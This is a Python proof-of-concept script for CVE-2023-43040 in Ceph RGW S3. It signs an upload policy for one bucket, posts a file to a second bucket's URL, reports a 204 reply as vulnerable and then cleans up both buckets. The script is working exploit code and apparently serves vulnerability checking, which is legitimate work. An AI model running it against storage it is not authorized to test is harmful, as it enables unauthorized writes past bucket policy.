README.md
Rendering markdown...
import base64
import datetime
import hashlib
import hmac
import json
import uuid
import boto3
import pytz
import requests
from botocore.client import Config
def connect(access_key, secret_key, endpoint, is_secure, ssl_verify):
    """Build a boto3 S3 client for the given endpoint.

    Args:
        access_key: Access key passed as ``aws_access_key_id``.
        secret_key: Secret key passed as ``aws_secret_access_key``.
        endpoint: URL passed as ``endpoint_url``.
        is_secure: Value forwarded to boto3's ``use_ssl`` option.
        ssl_verify: Value forwarded to boto3's ``verify`` option.

    Returns:
        The client object returned by ``boto3.client``; requests are
        configured for the ``s3v4`` signature version.
    """
    client_options = {
        'service_name': 's3',
        'aws_access_key_id': access_key,
        'aws_secret_access_key': secret_key,
        'endpoint_url': endpoint,
        'use_ssl': is_secure,
        'verify': ssl_verify,
        'config': Config(signature_version='s3v4'),
    }
    return boto3.client(**client_options)
def create_bucket(connection, bucket_name):
    """Create a bucket named after the first 10 characters of *bucket_name*.

    Args:
        connection: Client object exposing ``create_bucket(Bucket=...)``.
        bucket_name: Requested name; only its first 10 characters are used.

    Returns:
        The truncated bucket name when the response reports HTTP status 200.
        Otherwise the failure and the raw response are printed and ``None``
        is returned.
    """
    short_name = bucket_name[:10]
    print("[I] Creating bucket: {}".format(short_name))

    result = connection.create_bucket(Bucket=short_name)
    status_code = result['ResponseMetadata']['HTTPStatusCode']
    if status_code != 200:
        print("[E] Bucket creation failed!")
        print(result)
        return None
    return short_name
def delete_bucket(connection, bucket_name):
    """Empty *bucket_name* and then delete the bucket itself.

    Objects are listed and removed batch by batch until the listing reports
    ``KeyCount == 0``; the bucket is then deleted and the outcome printed.

    Args:
        connection: Client object exposing ``list_objects_v2``,
            ``delete_objects`` and ``delete_bucket``.
        bucket_name: Name of the bucket to purge and remove.

    Returns:
        None. Success (HTTP 204 on the bucket deletion) and failure are
        reported on stdout only.
    """
    listing = connection.list_objects_v2(Bucket=bucket_name)
    while listing['KeyCount'] > 0:
        removal = connection.delete_objects(
            Bucket=bucket_name,
            Delete={
                'Objects': [{'Key': obj['Key']} for obj in listing['Contents']]
            },
        )
        # If the service could not delete some keys they would be listed
        # again on the next pass and the loop would never terminate, so stop
        # here and report the failure instead.
        if removal.get('Errors'):
            print("[E] Bucket deletion failed!")
            print(removal)
            return
        listing = connection.list_objects_v2(Bucket=bucket_name)

    response = connection.delete_bucket(Bucket=bucket_name)
    if response['ResponseMetadata']['HTTPStatusCode'] == 204:
        print("[I] Bucket deleted successfully! {}".format(bucket_name))
        return
    print("[E] Bucket deletion failed!")
    print(response)
def generate_policy(bucket_name):
    """Return a base64-encoded POST policy document for *bucket_name*.

    The policy expires 6000 seconds from now (UTC) and carries these
    conditions: the given bucket, keys starting with ``foo``, a ``private``
    ACL, a Content-Type starting with ``text/plain`` and a content length
    between 0 and 1024.

    Args:
        bucket_name: Bucket name placed in the policy's ``bucket`` condition.

    Returns:
        bytes: The JSON policy document, UTF-8 encoded and then base64
        encoded.
    """
    # The standard library's UTC tzinfo yields the same timestamp text, so
    # no third-party timezone package is needed here.
    expires = (datetime.datetime.now(datetime.timezone.utc)
               + datetime.timedelta(seconds=6000))
    policy_document = {
        "expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "conditions": [
            {"bucket": bucket_name},
            ["starts-with", "$key", "foo"],
            {"acl": "private"},
            ["starts-with", "$Content-Type", "text/plain"],
            ["content-length-range", 0, 1024],
        ],
    }
    return base64.b64encode(json.dumps(policy_document).encode('utf-8'))
def sign_policy(policy, secret_key):
    """Sign *policy* with HMAC-SHA1 and return the base64-encoded digest.

    Args:
        policy: Bytes to sign (the encoded policy document).
        secret_key: Secret key as text; it is UTF-8 encoded to form the
            HMAC key.

    Returns:
        bytes: Base64 encoding of the raw HMAC-SHA1 digest.
    """
    key_bytes = bytes(secret_key, 'utf-8')
    mac = hmac.new(key_bytes, msg=policy, digestmod=hashlib.sha1)
    raw_digest = mac.digest()
    return base64.b64encode(raw_digest)
def post_object(endpoint, bucket_name, bad_bucket_name, policy, access_key, signature, ssl):
    """Send a multipart form POST uploading ``foo.txt``.

    The form's ``bucket`` field names *bucket_name*, while the request URL
    targets *bad_bucket_name* (presumably the mismatch this PoC probes;
    confirm against the advisory).

    Args:
        endpoint: Base URL of the S3 endpoint, without a trailing slash.
        bucket_name: Bucket name placed in the form's ``bucket`` field.
        bad_bucket_name: Bucket name appended to the URL path.
        policy: Encoded policy document sent in the ``policy`` field.
        access_key: Access key sent in the ``AWSAccessKeyId`` field.
        signature: Policy signature sent in the ``signature`` field.
        ssl: Value forwarded to ``requests.post`` as ``verify``.

    Returns:
        The response object returned by ``requests.post``.
    """
    target_url = "{}/{}".format(endpoint, bad_bucket_name)

    # Insertion order is kept on purpose: it determines the order of the
    # multipart fields, and the file part stays last.
    form_fields = {}
    form_fields["key"] = "${filename}"
    form_fields['bucket'] = bucket_name
    form_fields["AWSAccessKeyId"] = access_key
    form_fields["signature"] = signature
    form_fields["acl"] = "private"
    form_fields["policy"] = policy
    form_fields["Content-Type"] = "text/plain"
    form_fields['file'] = ('foo.txt', 'bar')

    return requests.post(target_url, files=form_fields, verify=ssl)
# Start-up banner. The ASCII-art rows are raw strings so that their
# backslashes are literal characters rather than invalid escape sequences;
# the trailing empty item gives the text its final newline.
BANNER = "\n".join((
    r" ______ ______ ___ ___ ___ ____ ____ ____ ___ ____ ___ ",
    r" / ___/ | / / __/___|_ |/ _ \|_ ||_ /___/ / /|_ // _ \/ / // _ \ ",
    r"/ /__ | |/ / _//___/ __// // / __/_/_ <___/_ _//_ </ // /_ _/ // /",
    r"\___/ |___/___/ /____/\___/____/____/ /_//____/\___/ /_/ \___/ ",
    "CEPH RGW S3 CVE-2023-43040 PoC",
    "by Trendyol Vulnerability Management Team - @riza.sabuncu",
    "",
))

# Show the banner only when the file is executed as a script.
if __name__ == '__main__':
    print(BANNER)

# Prefix of every bucket name generated by this script.
bucket_name_prefix = "bckt"
import argparse
import sys
def _str_to_bool(value):
    """Convert a command-line word such as ``true``/``no``/``1`` to a bool."""
    text = value.strip().lower()
    if text in ('1', 'true', 't', 'yes', 'y', 'on'):
        return True
    if text in ('0', 'false', 'f', 'no', 'n', 'off'):
        return False
    raise argparse.ArgumentTypeError(
        "expected a boolean value, got {!r}".format(value))


def _parse_args(argv=None):
    """Parse the command line; print help and exit(1) if a key or the endpoint is missing."""
    parser = argparse.ArgumentParser(description="RGW S3 CVE-2023-43040 PoC")
    parser.add_argument('--access_key', type=str, help="RGW Access Key")
    parser.add_argument('--secret_key', type=str, help="RGW Secret Key")
    parser.add_argument('--endpoint', type=str, help="RGW S3 Endpoint")
    # ``type=bool`` would turn every non-empty word (even "False") into True,
    # so an explicit converter is used. A bare flag means "enabled".
    parser.add_argument('--is_secure', type=_str_to_bool, nargs='?',
                        const=True, default=False,
                        help="SSL (default: False)")
    parser.add_argument('--ssl_verify', type=_str_to_bool, nargs='?',
                        const=True, default=False,
                        help="SSL Verification (default: False)")
    args = parser.parse_args(argv)
    if not (args.access_key and args.secret_key and args.endpoint):
        parser.print_help(sys.stderr)
        sys.exit(1)
    return args


def main(argv=None):
    """Run the PoC: create two buckets, POST across them, report, clean up.

    A policy is generated and signed for the first bucket, then the form is
    posted to the URL of the second bucket. An HTTP 204 reply is reported as
    vulnerable, any other status as not vulnerable. Every bucket that was
    created is deleted afterwards, even when an intermediate step raises.

    Args:
        argv: Optional list of command-line arguments; ``None`` (the
            default) makes argparse read ``sys.argv``.

    Raises:
        SystemExit: With status 1 when a required argument is missing or a
            bucket could not be created; with status 2 when argparse rejects
            an argument.
    """
    args = _parse_args(argv)
    endpoint = args.endpoint.rstrip('/')

    print("[I] Connecting to RGW S3 Endpoint: {}".format(endpoint))
    connection = connect(args.access_key,
                         args.secret_key,
                         endpoint,
                         args.is_secure,
                         args.ssl_verify)

    created = []
    try:
        for _ in range(2):
            name = create_bucket(connection,
                                 "{}{}".format(bucket_name_prefix,
                                               uuid.uuid4().hex))
            if name is None:
                # create_bucket has already printed the failure details.
                sys.exit(1)
            created.append(name)
        new_bucket, bad_bucket = created

        policy = generate_policy(new_bucket)
        signature = sign_policy(policy, args.secret_key)
        post_status = post_object(endpoint,
                                  new_bucket,
                                  bad_bucket,
                                  policy,
                                  args.access_key,
                                  signature,
                                  args.ssl_verify)
        if post_status.status_code == 204:
            print("[🚨] Vulnerable! Status code: {}".format(post_status.status_code))
        else:
            print("[✅] Not vulnerable! Status code: {}".format(post_status.status_code))
    finally:
        # Remove whatever was created, in creation order, so that a failure
        # part-way through does not leave buckets behind.
        for name in created:
            delete_bucket(connection, name)
# Run the PoC only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()